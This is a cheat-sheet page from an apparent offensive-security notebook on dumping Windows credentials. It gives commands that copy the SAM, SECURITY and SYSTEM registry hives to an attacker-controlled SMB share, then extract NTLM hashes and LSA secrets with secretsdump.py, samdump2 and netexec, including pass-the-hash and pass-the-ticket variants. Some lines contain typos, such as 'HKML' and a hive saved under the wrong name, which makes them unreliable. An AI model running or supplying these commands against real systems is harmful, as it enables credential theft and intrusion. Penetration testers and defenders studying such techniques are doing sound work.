đź’ĄCyb3rBook

SAM & SECURITY

2 min read

PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Theory

Target Information 🎯

  • SAM → Hashes LM and NTLM

  • SECURITY → LSA Secrets (Cached Credentials for Domain Accounts…)

Both files have to be extracted from the target

However, since the sensitive data in this files is encrypted using the Bootkey/Syskey symmetric key stored in the SYSTEM registry hive, we also need it to decrypt them

So, this can be done in the following ways depending on the state of the target system

Exfiltration - Down Windows

OS File System
From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
From the Target
Copy-Item -Force -Path "C:\Windows\System32\Config\SAM", "C:\Windows\System32\Config\Security", "C:\Windows\System32\Config\SYSTEM" -Destination "X:"

Exfiltration - Live Windows

Windows Registry

Registry Hives

From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
From the Target
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
reg save HKLM\sam X:\SAM
reg save HKLM\security X:\SAM
reg save HKML\system X:\SYSTEM

Exfiltration - Linux

Reg.py - Impacket

Reg.py

Start an SMB Server to receive the data

SMBServer.py

smbserver.py -smb2support <SHARE> $( pwd )
Export the Registry Hives of the Target
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SAM' -o '\\<ATTACKER>\<SHARE>'
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SYSTEM' -o '\\<ATTACKER>\<SHARE>'
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SECURITY' -o '\\<ATTACKER>\<SHARE>'
  • Backup all of them at once
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' backup -o '\\<ATTACKER>\<SHARE>'

Secrets Dump

Once the above files are obtained, just proceed as follows to extract the data from them →

Secretsdump.py

SecretsDump.py

Offline Dumping

First, all these Registry Hives must be extracted from the target

Then, these files are parsed locally as follows →

secretsdump.py -outputfile <FILE> -sam <SAM> -security <SECURITY> -system <SYSTEM> local
Remote Dumping

Plain Password

secretsdump.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>'

Pass the Hash

secretsdump.py -hashes 'LM:NT' '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Pass the Key

secretsdump.py -aesKey '<KEY>' '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Pass the Ticket

export KRB5CCNAME=<CCACHE>
secretsdump.py -k -no-pass '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'
Samdump2

Samdump2

samdump2 <SYSTEM> <SAM>

Only SAM and SYSTEM, not SECURITY

Netexec

Netexec

SAM
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --local-auth --sam
Security (LSA Secrets)
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --local-auth --lsa

Graph View

Backlinks